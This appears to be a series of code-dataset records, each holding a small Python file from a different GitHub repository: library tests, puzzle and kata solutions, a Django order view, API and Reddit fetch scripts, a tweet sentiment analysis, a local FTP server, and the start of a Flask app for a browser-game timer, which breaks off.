slice(5), # [:5]\n slice(-5), # [:-5]\n slice(1, 2), # [1:2]\n slice(100), # longer slice than possible\n slice(6, 4, -1), # [6:4:-1]\n slice(5, 5), # empty\n ])\n def test_getslice(self, s):\n truths = self.obj_list[s]\n tests = self.table[s]\n for i, j in zip(truths, tests):\n assert i == j\n\n def test_bogus_access(self):\n with pytest.raises(TypeError, match=\"type tuple\"):\n self.table[(1, 2, 3)]\n\n\nclass TestPseudoTable(object):\n def setup_method(self):\n self.objs = {None: UnnamedUUID(normal_attr=10)}\n self.objs.update(all_objects)\n self.obj_list = list(self.objs.values())\n self.pseudo_table = PseudoTable(self.obj_list)\n\n @pytest.mark.parametrize('name', ['int', None])\n def test_get_by_uuid(self, name):\n obj = 
self.objs[name]\n uuid = get_uuid(obj)\n expected = self.objs[name]\n assert self.pseudo_table.get_by_uuid(uuid) == expected\n\n @pytest.mark.parametrize('name', ['int', None])\n def test_getitem(self, name):\n obj = self.objs[name]\n idx = self.pseudo_table.index(obj)\n assert self.pseudo_table[idx] == obj\n if name is not None:\n assert self.pseudo_table[name] == obj\n\n @pytest.mark.parametrize(\"s\", [slice(None), # [:]\n slice(5), # [:5]\n slice(-5), # [:-5]\n slice(1, 2), # [1:2]\n slice(100), # longer slice than possible\n slice(6, 4, -1), # [6:4:-1]\n slice(5, 5), # empty\n ])\n def test_getslice(self, s):\n truths = self.obj_list[s]\n tests = self.pseudo_table[s]\n for i, j in zip(truths, tests):\n assert i == j\n\n def test_bogus_access(self):\n with pytest.raises(TypeError, match=\"tuple\"):\n self.pseudo_table[(1, 2, 3)]\n\n @pytest.mark.parametrize('name', ['int2', None])\n def test_setitem(self, name):\n value = {'int2': 20, None: 21}[name]\n item = {'int2': MockUUIDObject(name=\"int2\", normal_attr=value),\n None: UnnamedUUID(normal_attr=value)}[name]\n\n len_table = len(self.pseudo_table)\n\n self.pseudo_table[len_table-1] = item\n assert item in self.pseudo_table\n assert self.pseudo_table[len_table-1] == item\n if name is not None:\n assert self.pseudo_table[name] == item\n\n @pytest.mark.parametrize('name', ['int2', None])\n def test_append(self, name):\n value = {'int2': 20, None: 21}[name]\n item = {'int2': MockUUIDObject(name=\"int2\", normal_attr=value),\n None: UnnamedUUID(normal_attr=value)}[name]\n\n len_table = len(self.pseudo_table)\n\n self.pseudo_table.append(item)\n assert item in self.pseudo_table\n assert self.pseudo_table[len_table] == item\n if name is not None:\n assert self.pseudo_table[name] == item\n\n def test_delitem(self):\n assert len(self.pseudo_table) == len(all_objects) + 1\n assert self.objs['int'] in self.pseudo_table\n int_idx = self.pseudo_table._sequence.index(self.objs['int'])\n del self.pseudo_table[int_idx]\n assert len(self.pseudo_table) == len(all_objects)\n assert self.objs['int'] not in self.pseudo_table\n with pytest.raises(KeyError, match='int'):\n self.pseudo_table['int']\n\n def test_len(self):\n assert len(self.pseudo_table) == len(all_objects) + 1\n\n @pytest.mark.parametrize('name', ['int2', None])\n def test_insert(self, name):\n value = {'int2': 20, None: 21}[name]\n item = {'int2': MockUUIDObject(name=\"int2\", normal_attr=value),\n None: UnnamedUUID(normal_attr=value)}[name]\n\n len_table = len(self.pseudo_table)\n\n self.pseudo_table.insert(len_table, item)\n assert item in self.pseudo_table\n assert self.pseudo_table[len_table] == item\n if name is not None:\n assert self.pseudo_table[name] == item\n","repo_name":"openpathsampling/openpathsampling","sub_path":"openpathsampling/experimental/simstore/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"78"} +{"seq_id":"71525037053","text":"\nfrom collections import Counter\n\nwith open('inputs/2021-12-03.txt') as input_file:\n file = [_ for _ in input_file.read().splitlines()]\n file_copy = file.copy()\n\n\nBINARY_LENGTH = len(file[0])\n\n# PART 1\ngamma, epsilon = '', ''\n\nfor i in range(BINARY_LENGTH):\n\n bits = [b[i] for b in file]\n counts = Counter(bits)\n\n if counts['1'] > counts['0']:\n gamma += '1'\n epsilon += '0'\n elif counts['0'] > counts['1']:\n gamma += '0'\n epsilon += '1'\n\ngamma = int(gamma, 2)\nepsilon = int(epsilon, 
2)\nprint(gamma * epsilon)\n\n# PART 2\noxygen, co2 = 0, 0\n\nfor i in range(BINARY_LENGTH):\n\n # OXYGEN\n bits = [b[i] for b in file]\n counts = Counter(bits)\n\n if counts['1'] >= counts['0']:\n file = [b for b in file if b[i] == '1']\n else:\n file = [b for b in file if b[i] == '0']\n\n if len(file) == 1:\n oxygen = file[0]\n\n # CO2\n bits = [b[i] for b in file_copy]\n counts = Counter(bits)\n\n if counts['1'] >= counts['0']:\n file_copy = [b for b in file_copy if b[i] == '0']\n else:\n file_copy = [b for b in file_copy if b[i] == '1']\n\n if len(file_copy) == 1:\n co2 = file_copy[0]\n\noxygen = int(oxygen, 2)\nco2 = int(co2, 2)\nprint(oxygen * co2)\n","repo_name":"aaronrausch/advent-of-code","sub_path":"2021/2021-12-03.py","file_name":"2021-12-03.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9891325792","text":"import uuid\nfrom datetime import date\n\nfrom django.shortcuts import render\n\nfrom boec.models.customermodel.Customer import Customer\nfrom boec.models.itemmodel.Item import Item\nfrom boec.models.ordermodel.Order import Order\n\n\ndef create_order(request, item_id):\n item = Item.objects.get(id=item_id)\n total = ((100 - float(item.discount))/100) * float(item.price)\n return render(request, 'order_details.html', {'item':item, 'total':total})\n\ndef confirm_order(request, item_id):\n item = Item.objects.get(id=item_id)\n total = ((100 - float(item.discount)) / 100) * float(item.price)\n customerId = request.session.get('customer_id')\n customer = Customer.objects.get(id=customerId)\n now = date.today()\n code=uuid.uuid4()\n order = Order.objects.create(customer=customer, item=item, total=total, code=code, createDate=now, status='CREATED')\n shipTotal = total * 0.05\n return render(request, 'shipment_information.html', {'order':order, 'shipTotal':shipTotal, 'customerName':order.customer.__getName__()})","repo_name":"trinhvandat/boec-python","sub_path":"boec/business/orderdao/OrderDAO.py","file_name":"OrderDAO.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15582741712","text":"# default package\nimport xml.etree.ElementTree as ET\nfrom logging import getLogger\nfrom typing import Dict\n\n# third party\nimport pandas as pd\nimport requests\n\n# logger\nlogger = getLogger(__name__)\n\n\ndef get_value(element: ET.Element, query: str) -> str:\n \"\"\"elementの要素をfindして結果をtextとして返す。queryがない場合はNoneを返す。\n\n Args:\n element (ET.Element): 検索するelemnet\n query (str): 検索クエリ\n\n Returns:\n str: 検索結果\n \"\"\"\n val = element.find(query)\n return val.text if val is not None else None\n\n\ndef convert_type(element: ET.Element) -> Dict:\n \"\"\"elementから要素をDictとして返す。\n\n Args:\n element (ET.Element): 探索するelement\n\n Returns:\n Dict: データ\n \"\"\"\n return {\n \"title\": get_value(element, \"title\"),\n \"link\": get_value(element, \"link\"),\n \"author\": get_value(element, \"author\"),\n \"pubDate\": get_value(element, \"pubDate\"),\n }\n\n\ndef _main() -> None:\n \"\"\"動作テスト用の簡易スクリプト\n \"\"\"\n # ログ設定\n import logging\n\n logging.basicConfig(level=logging.INFO)\n\n # パラメータ設定\n url = \"http://iss.ndl.go.jp/api/opensearch\"\n params_example = {\n \"title\": \"機械学習\",\n \"mediatype\": \"1\",\n \"from\": \"2019-01-01\",\n \"cnt\": \"10\",\n \"idx\": \"1\",\n }\n\n # API に問い合わせ\n response = requests.get(url, params_example)\n\n # XML 形式で取得できるので pandas.DataFrame 形式に変換\n root = 
ET.fromstring(response.text.encode(\"utf-8\"))\n df = pd.DataFrame([convert_type(item) for item in root.findall(\".//item\")])\n\n # 取得結果を表示\n logger.info(f\"=== data ===\\n{df.head()}\")\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"iimuz/til","sub_path":"python/iss_ndl_api/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"ja","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"74661723131","text":"#niveles de ingreso de una persona durante el 2020 \nimport matplotlib.pyplot as plt\ningresos = [300, 450, 420, 200, 540, 210, 360, 410, 520, 600, 390, 550]\nmeses = ['Enero', 'Febrero', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre']\nplt.bar (meses, ingresos, width=0.3, color= 'y')\nplt.title ('Ingresos de una persona en el 2020')\nplt.xlabel ('Meses')\nplt.ylabel ('Ingresos de una persona en miles')\nplt.savefig ('ingresos.png')\nplt.show()\n\n","repo_name":"Izavella-Valencia/programacion","sub_path":"Talleres/Tallergraficos.py","file_name":"Tallergraficos.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1290965331","text":"'''\n1) rearrange the word ---> “gamanra”\ntestcase1 = [“anagram”, “gamanra”, True]\n2) rearrange and change capitalization ---> “GraMana”\nI need two tests to verify that capitalization is ignored for both input strings\ntestcase2a= [“anagram”, “GraMana”, True]\ntestcase2b= [“AnAgrAm”, “gramana”, True]\n3) swap only 2 characters\na) at the start “naagram”\ntestcase3a= [“anagram”,“naagram”, True]\nb) in the middle “anargam”\ntestcase3b= [“anagram”, “anargam”, True]\nc) at the end “anagrma”\ntestcase3c= [“anagram”, “anagrma”, True]\n4) test the shortest possible anagram (containing only two characters)\ntestcase4 = [“an”, “na”, True]\n\nanother examples:\n\nJim Morrison = Mr Mojo Risin\nDamon Albarn = Dan Abnormal\nGeorge Bush = He bugs Gore\nClint Eastwood = Old West action\nRonald Reagan = A d;rn long era\nElvis = Lives\nMadonna Louise Ciccone = One cool dance musician\n\n-------------------------------------------------------------------------------------\npositive_testcases = {\"Ronald Reagan\": \"A darn long era\", \"Elvis\": \"Lives\",\n \"Madonna Louise Ciccone\": \"One cool dance musician\",\n \"Jim Morrison\": \"Mr Mojo Risin\",\n \"Damon Albarn\": \"Dan Abnormal\",\n \"George Bush\": \"He bugs Gore\",\n \"Clint Eastwood\": \"Old West action\",\n \"AnAgrAm\": \"gramana\",\n \"an\": \"na\"}\n--------------------------------------------------------------------------------------\n\nFor simplicity, I keep my base word “anagram”\n1) a completely different word\na) of same length\ntestcase1a = [“anagram”, “wxdcfvb”, False]\nb) of different length\ntestcase1b = [“anagram”, “python”, False]\n\n-------------------------------------------------------------------------------------\nnegative_testcases = {\"anagram\": \"wxdcfvb\", \"anagramx\": \"python\"}\n--------------------------------------------------------------------------------------\n\n'''\n\nfrom solutions.Strings import anagrams\n\npositive_testcases = {\"Ronald Reagan\": \"A darn long era\", \"Elvis\": \"Lives\",\n \"Madonna Louise Ciccone\": \"One cool dance musician\",\n \"Jim Morrison\": \"Mr Mojo Risin\",\n \"Damon Albarn\": \"Dan Abnormal\",\n \"George Bush\": \"He bugs Gore\",\n \"Clint Eastwood\": \"Old West action\",\n \"AnAgrAm\": \"gramana\",\n 
\"an\": \"na\"}\nnegative_testcases = {\"anagram\": \"wxdcfvb\", \"anagramx\": \"python\"}\n\n\ndef test_anagram_v1():\n for firstString, secondString in positive_testcases.items():\n assert anagrams.anagram_v1(firstString, secondString) is True\n\n for firstString, secondString in negative_testcases.items():\n assert anagrams.anagram_v1(firstString, secondString) is False\n\n\ndef test_anagram_v2():\n for firstString, secondString in positive_testcases.items():\n assert anagrams.anagram_v2(firstString, secondString) is True\n for firstString, secondString in negative_testcases.items():\n assert anagrams.anagram_v2(firstString, secondString) is False\n","repo_name":"ajaymahar/Python-ds-algo","sub_path":"tests/test_anagrams.py","file_name":"test_anagrams.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"12293076087","text":"# 가방문제\n# 냅색 문제는 기본적으로 dp[j] 에 j(금액)일때 최소/최대가 되는 가치 저장 \n\nn, m = map(int, input().split())\ndp = [0]*(m+1)\n\nfor i in range(n): # 각 인풋 물건에 대하여 (w, v) = (무게, 가치)\n w, v = map(int, input().split())\n\n for x in range(w, m+1): # 보석의 무게부터 끝까지\n tmp = dp[x-w] + v # dp[x-w]+v 가 dp[x] 보다 크면 대입\n \n if tmp > dp[x]: # 이때 dp[x-w]에서 x-w은 자신의 무게를 넣고 남은 값이라 생각.\n dp[x]=tmp # 그 남은 값을 채우는 가치의 최댓값이 dp[x-w]이니\n # 이를 자기 가치(v) 와 더하면 x번째의 가치(dp[x])의 최댓값이 됨 \n\nprint(dp[m])","repo_name":"jhan756k/Algorithm","sub_path":"Study/동적계획법/냅색알고리즘_무한사용.py","file_name":"냅색알고리즘_무한사용.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36369463720","text":"# https://www.codewars.com/kata/clock-in-mirror/train/python\n\ndef what_is_the_time(time_in_mirror):\n t = time_in_mirror.split(':')\n range = 60 * 12\n t[0] = int(t[0]) * 60\n t[1] = int(t[1])\n cur_time = sum(t)\n res_time = range - cur_time\n conv_hou = res_time / 60\n conv_min = res_time - (60 * conv_hou)\n \n if len(str(conv_min)) == 1:\n conv_min = \"0\" + str(conv_min)\n if len(str(conv_hou)) == 1:\n conv_hou = \"0\" + str(conv_hou)\n \n conv_time = str(conv_hou) + \":\" + str(conv_min)\n \n if conv_time[:2] == \"00\":\n conv_time = \"12\" + conv_time[-3:]\n if conv_time[:2] == \"-1\":\n conv_time = \"11\" + conv_time[-3:]\n return conv_time\n\n","repo_name":"zerotheblackmage/codewar","sub_path":"mirClock.py","file_name":"mirClock.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9971143408","text":"\"\"\"\r\n035\r\nDesenvolva um programa que leia o comprimento de três retas e diga ao usuário se\r\nelas podem ou não formar um triângulo\r\n\"\"\"\r\nfrom termcolor import colored\r\n\r\n\r\ndef triangulo(a, b, c):\r\n if a * b * c <= 0:\r\n return False\r\n if a <= abs(b-c) or a > (b+c):\r\n return False\r\n return True\r\n\r\n\r\nladoA = int(input(\"Digite o lado A: \"))\r\nladoB = int(input(\"Digite o lado B: \"))\r\nladoC = int(input(\"Digite o lado C: \"))\r\n\r\n\r\nif triangulo(ladoA, ladoB, ladoC):\r\n print(colored(\"Eh possivel formar um triangulo com os lados {} {} {}\".format(ladoA, ladoB, ladoC), \"green\"))\r\nelse:\r\n print(colored(\"Nao eh possivel formar um triangulo com os lados {} {} {}\".format(ladoA, ladoB, ladoC), \"red\"))","repo_name":"vitorsemidio-dev/curso-python-guanabara","sub_path":"Desafios/Aula 
010/ex035.py","file_name":"ex035.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33927769548","text":"#-------Python v3.8.10-------#\n\n#Tri du fichier sal.txt en fonction de la 12eme colonne après SAL_GEN\n\n\ndef exercice_un():\n\n#Lecture du fichier sal.txt avec spécification de l'encodage pour le point d'interrogation inversé\n with open(\"../data/sal.txt\", encoding=\"latin-1\") as file:\n data = file.read()\n\n#Création d'une liste des différents clients en découpant les données autour des SAL_GEN\n list_clients = data.split(\"SAL_GEN\")\n\n#Je retire la ligne html qui a été ajoutée au dernier client\n list_clients[len(list_clients)-1] = list_clients[len(list_clients)-1].split(\"\")[0]\n\n#Je retire également la première entrée qui est vide puisqu'elle est avant le premier SAL_GEN\n list_clients = list_clients[1:]\n\n#Pour chaque client, je construit une liste de ses différents champs en séparés du ¿\n data_clients = []\n for i in range(len(list_clients)):\n data_clients.append(list_clients[i].split(\"¿\"))\n data_clients[i] = data_clients[i][1:]\n\n#Création de la nouvelle liste contenant les clients ordonnées en fonction de la 12ème colonne\n sorted_data_clients = sorted(data_clients,key = lambda x: x[11])\n\n#Reconstruction des données en concaténant les différentes listes et en rajoutant les séparateurs\n result = \"SAL_GEN\"\n for i in range(len(sorted_data_clients)):\n result += \"¿\"\n for y in range(len(sorted_data_clients[i])):\n result += sorted_data_clients[i][y]\n#On s'assure de ne pas rajouter le séparateur pour la dernière ligne\n if y != len(sorted_data_clients[i]) - 1:\n result += \"¿\"\n#Idem\n if i != len(sorted_data_clients) - 1:\n result += \"SAL_GEN\"\n\n#Rajout du compteur\n count = \"\" + str(len(sorted_data_clients)) + \"\\n\"\n result += count\n\n#On écrit les données triées dans un fichier qui sera créé dans le dossier results/tri\n sorted_file = open(\"../results/tri/exercice1.txt\",\"w\")\n sorted_file.write(result)\n sorted_file.close()\n\n return 0\n\n#-------------------Lancement de la fonction-------------------#\n\nexercice_un()\n\n","repo_name":"ClementCorm/tests_tech_cormier","sub_path":"tests_tech_cormier_clement/scripts_tri/script_ex1.py","file_name":"script_ex1.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39866974891","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\n@author: Ali Yusuf\r\n\"\"\"\r\n# Download snscrape model to scrape tweets and also vaderSentiment model to conduct the sentiment analysis\r\n# To download models use the two following commands in the Anaconda command prompt terminal\r\n# pip install snscrape\r\n# pip install vaderSentiment\r\n\r\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\r\nimport snscrape.modules.twitter as sntwitter\r\nimport pandas as pd\r\nimport seaborn as sns\r\n\r\n# Creating list to append tweet data to\r\ntweets_list2 = []\r\n\r\n# Using TwitterSearchScraper to scrape data and append tweets to list\r\nfor i, tweet in enumerate(sntwitter.TwitterSearchScraper('CDC COVID since:2022-01-01 until:2022-05-01').get_items()):\r\n if i > 3000:\r\n break\r\n tweets_list2.append([tweet.date, tweet.id, tweet.content])\r\n\r\n# Creating a dataframe from the tweets list above\r\ntweets_df2 = pd.DataFrame(tweets_list2, columns=[\r\n 'Datetime', 'Tweet Id', 
'Text'])\r\n\r\narticle_text = tweets_df2[\"Text\"].tolist()\r\n\r\n# from vaderSentiment import SentimentIntensityAnalyzer (as we downloaded it using pip install)\r\n\r\n\r\n# the seintmentintensityanalyzer that we just imported is saved as analyzer to ease its use\r\nanalyzer = SentimentIntensityAnalyzer()\r\nfor sentence in article_text: # here we are taking all the 80 quotes in the list\r\n # then for each of these quotes we will use the analyzer to find the polarity score for each sentence and saved it as vs \"VaderSentiment\"\r\n vs = analyzer.polarity_scores(sentence)\r\n # we are formatting the output and printing each sentence with the vs scores next to it\r\n print(\"{:>0} {}\".format(sentence, (vs)))\r\n\r\n# we are setting our display options\r\npd.set_option(\"display.max_colwidth\", 100)\r\n\r\n# creating a dataframe showing the quotes in the list\r\ndf = pd.DataFrame(article_text, columns=[\"tweets\"])\r\n\r\n\r\ndef get_scores(tweets): # create a function of analyzer model to analyze the quotes we added to the dataframe\r\n # analyze the quotes via the vader analyzer\r\n vader_scores = analyzer.polarity_scores(tweets)\r\n\r\n return pd.Series({\r\n 'Quotes': tweets,\r\n 'Vader': vader_scores['compound'],\r\n }) # assign the analyzer to variables of the dataframe to display it\r\n\r\n\r\n# we are creating a dataframe and recalling the function we created and applying it on the quotes\r\nscores = df.tweets.apply(get_scores)\r\n# Take the numeric data of scores and round them to -1 Negative if they are below 0 and 1 Positive if greater than 0 (0 will remain 0 Neutral)\r\nnum = scores._get_numeric_data()\r\nnum[num < 0] = -1\r\nnum[num > 0] = 1\r\n\r\n# display the dataframe with color map (Red, Yellow, Green) depending on negative red and positive green with below 0.4 getting low and above 0.4 getting high to enable balancing with yellow\r\nscores.style.background_gradient(cmap='RdYlGn', axis=None, low=0.4, high=0.4)\r\nfig = sns.countplot(x='Vader', data=scores)\r\nfg = fig.get_figure()\r\nfg.savefig('Vader_Score.png') #save figure\r\n\r\n# resources https://www.analyticsvidhya.com/blog/2021/06/twitter-sentiment-analysis-a-nlp-use-case-for-beginners/\r\n# resource2 https://medium.com/dataseries/how-to-scrape-millions-of-tweets-using-snscrape-195ee3594721\r\n","repo_name":"alimyusuf/Sentiment_Analysis_for_Policy","sub_path":"Sentiment_Analysis_Vader_Tweets.py","file_name":"Sentiment_Analysis_Vader_Tweets.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15715452735","text":"#!/usr/bin/python3\n'''\n___________________\nmodule that contains recurse(subreddit, hot_list=[]): function\n___________________\n'''\nimport requests\nimport sys\n\n\ndef recurse(subreddit, hot_list=[]):\n '''\n return the first number of hot posts listed for a given subreddit.\n '''\n after = None\n request = None\n if len(subreddit.split(\"|\")) > 1:\n after = subreddit.split(\"|\")[1]\n request = requests.get(\n 'https://www.reddit.com/r/' + subreddit.split(\"|\")[0] +\n '/hot.json?after='+subreddit.split(\"|\")[1],\n allow_redirects=False,\n headers={'User-agent': 'gefrancof'}\n )\n else:\n request = requests.get(\n 'https://www.reddit.com/r/' + subreddit +\n '/hot.json',\n allow_redirects=False,\n headers={'User-agent': 'gefrancof'}\n )\n if request.status_code == 200:\n\n dictionary = request.json()\n\n data = dictionary['data']\n\n if data[\"after\"] is None:\n return hot_list\n else:\n for 
data_index in data['children']:\n                data_children = data_index['data']\n                hot_list.append(data_children['title'])\n            return recurse(\n                subreddit.split(\"|\")[0] +\n                \"|\" + data[\"after\"],\n                hot_list)\n","repo_name":"gefranco/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17163832117","text":"import sys\nn,k = map(int,input().split())\na=[int(sys.stdin.readline())for _ in range(n)]\na.reverse()\ncnt = 0\nfor i in a:\n    cnt += k//i\n    k %= i\n    if k == 0:\n        break\nprint(cnt)","repo_name":"twodf78/coding_test","sub_path":"GreedyAlgorithm/11047.py","file_name":"11047.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15726218243","text":"c, d = int(input()), int(input())\nn, m = int(input()), int(input())\nk = int(input())\ndef sol(c, d ,n, m ,k):\n    ans = 0\n    if not k >= n * m:\n        main_price = c / n\n        add_price = float(d)\n        if add_price <= main_price:\n            ans = d * (n * m - k)\n        else:\n            exact = d * ((n * m - k) % n) + c * ((n * m - k) // n)\n            approx = c * ((n * m - k) // n + 1)\n            ans = min(exact, approx)\n    return ans\n\n\nprint(sol(c, d, n, m, k))\n","repo_name":"Roomdead/SIAOD","sub_path":"Курсач/N1.py","file_name":"N1.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72549687611","text":"\"\"\"Author: @speckly\nhttps://github.com/speckly\n\nA program to start a ftp server and allow users to interact with it \nRef: \nhttps://pyftpdlib.readthedocs.io/en/latest/tutorial.html\nhttps://pyftpdlib.readthedocs.io/en/latest/api.html\n\"\"\"\n\ntry:\n    from pyftpdlib.authorizers import DummyAuthorizer\n    from pyftpdlib.handlers import FTPHandler\n    from pyftpdlib.servers import FTPServer\nexcept ModuleNotFoundError:\n    import os\n    MODULE = \"pyftpdlib\"\n    if input(f\"{MODULE} is required to run this program, execute pip install {MODULE}? 
(Y): \").lower().strip() in [\"\", \"y\"]:\n os.system(f\"pip install {MODULE}\")\n else:\n exit()\n\ndef servStart():\n # Instantiate a dummy authorizer for managing 'virtual' users\n authorizer = DummyAuthorizer() # handle permission and user\n # Define an anonymous user and input home directory having read permissions\n while True:\n try:\n direct = input(\"Enter server home directory: \")\n authorizer.add_anonymous(direct , perm='elradfmwM') #originally elr is not enough \n break\n except:\n print(\"Invalid directory please try again\")\n # Instantiate FTP handler class\n handler = FTPHandler # understand FTP protocol\n handler.authorizer = authorizer\n\n # Instantiate FTP server class and listen on 127.0.0.1:2121\n address = ('127.0.0.1', 2121)\n server = FTPServer(address, handler)\n\n server.serve_forever()\n\nservStart()","repo_name":"speckly/sec-test","sub_path":"ftp-server.py","file_name":"ftp-server.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2352751430","text":"def print_cube(slices,zdim):\n slice_num = 0\n for slice in slices:\n print(\"z=\" + str(slice_num))\n for row in slice:\n print (row)\n slice_num += 1\n\ndef expand_z(slices):\n #add 2 slices to cube\n size_xy = len(slices[0][0])\n new_row = ['.'] * size_xy\n new_slicef = []\n new_sliceb = []\n for i in range(0,size_xy):\n new_slicef.append(new_row.copy())\n new_sliceb.append(new_row.copy())\n slices.insert(0,new_slicef)\n slices.append(new_sliceb)\n\ndef count_active(slices):\n count = 0 \n for slice in slices:\n for row in slice:\n for elem in row:\n if elem == '#':\n count += 1\n return count\n\ndef expand_xy(slices):\n size_xy = len(slices[0][0])\n new_size_xy = size_xy + 2\n new_row = ['.'] * new_size_xy\n for slice in slices:\n for row in slice:\n #expand row to left and right\n row.insert(0,'.')\n row.append('.')\n #add row at top and bottom\n \n slice.insert(0,new_row.copy())\n slice.append(new_row.copy())\n\ndef get_val(slices,x,y,z):\n #size_xy = len(slices[0][0])\n #size_z = len(slices)\n return slices[z][y][x]\ndef set_val(slices,x,y,z, val):\n slices[z][y][x] = val\n\ndef get_active_count(slices,x,y,z):\n lim = [-1,0,1]\n size_xy = len(slices[0][0])\n size_z = len(slices)\n if get_val(slices,x, y, z) == '#':\n count = -1\n else:\n count = 0\n for off_x in lim:\n x_loc = x + off_x\n if x_loc >= 0 and x_loc < size_xy: \n for off_y in lim:\n y_loc = y + off_y\n if y_loc >= 0 and y_loc < size_xy:\n for off_z in lim:\n z_loc = z + off_z\n if z_loc >=0 and z_loc < size_z: \n if get_val(slices,x_loc, y_loc, z_loc) == '#':\n count += 1\n return count \n\n\n\n\n\nfile = open('input.txt', 'r')\n\n\nslices = []\nz_dim = 0\ninit_slice = []\nfor line in file:\n row = line.strip()\n row = list(row)\n init_slice.append(row)\n\nslices.append(init_slice)\n\nprint_cube(slices,z_dim)\n\n\n\n\n\nfor cycle in range(1,7):\n expand_z(slices)\n expand_xy(slices)\n print_cube(slices,cycle)\n size_xy = len(slices[0][0])\n size_z = len(slices)\n\n #build next cube:\n next_cube = []\n\n for z in range(0,size_z):\n new_slice = []\n for y in range(0,size_xy):\n new_row = []\n for x in range(0,size_xy):\n adj = get_active_count(slices,x,y,z)\n val = get_val(slices,x,y,z)\n if val == '#':\n if adj == 2 or adj == 3:\n new_row.append('#')\n else:\n new_row.append('.')\n elif val == '.' 
and adj == 3:\n new_row.append('#')\n else:\n new_row.append(val)\n new_slice.append(new_row)\n next_cube.append(new_slice)\n \n #print(\"cycle=\" + str(cycle))\n #print(count_active(slices))\n print_cube(next_cube,cycle)\n \n slices = next_cube\n \n\n\nprint(count_active(slices))","repo_name":"kwiegand/Advent-of-Code-2020","sub_path":"17/puz.py","file_name":"puz.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42222936068","text":"gracz1 = input(\"Podaj nazwe: \")\ngracz2 = input(\"Podaj nazwe: \")\n\ngracz1_wybor = input(\"%s, Co wybierasz? Kamień, Papier, Nożyczki?\" % gracz1)\ngracz2_wybor = input(\"%s, Co wybierasz? Kamień, Papier, Nożyczki?\" % gracz2)\n\n\ndef ruchy(gracz1, gracz2):\n if gracz1 == gracz2:\n return (\"Remis\")\n elif gracz1 == 'Kamień':\n if gracz2 == 'Nożyczki':\n return (\"Kamień wygrywa\")\n else:\n return (\"Papier wygrywa\")\n elif gracz1 == 'Nożyczki':\n if gracz2 == 'Papier':\n return (\"Nożyczki wygrały\")\n else:\n return (\"Kamień wygrywa\")\n elif gracz1 == 'Papier':\n if gracz2 == 'Kamień':\n return (\"Papier wygrywa\")\n else:\n return (\"Nożyczki wygrały\")\n else:\n return (\"Błąd, złe dane. Spróbuj ponownie.\")\n\nprint(ruchy(gracz1_wybor, gracz2_wybor))","repo_name":"Kubaxoxo/Projkety-PY","sub_path":"pr py1/papier,kamien,nozyce.py","file_name":"papier,kamien,nozyce.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71004749053","text":"def selectionSort(number, size):\r\n for i in range(size):\r\n min = i\r\n\r\n for x in range(i + 1, size):\r\n if number[x] < number[min]:\r\n min = x\r\n\r\n number[i], number[min] = number[min], number[i]\r\n\r\n\r\nnumbers = [1, 9, 2, 10, 8, 13, 5]\r\nsize = len(numbers)\r\nselectionSort(numbers, size)\r\nprint(f\"Numbers: {numbers}\")\r\n","repo_name":"AkisGeorg/Python-Scripts","sub_path":"Selection Sort Function.py","file_name":"Selection Sort Function.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18447712760","text":"from flask import Flask, render_template, request, redirect, flash, url_for, send_from_directory\nfrom flask.json import jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import desc\nimport os, ast\nimport json\nimport dateutil.parser\nfrom datetime import datetime, timedelta\nfrom dstimer import import_action\nfrom dstimer import import_template\nfrom dstimer import import_keks\nfrom dstimer import __version__, __needUpdate__\nfrom dstimer import delete_action\nfrom dstimer import world_data\nfrom dstimer import common\nimport dstimer.common as common\nimport 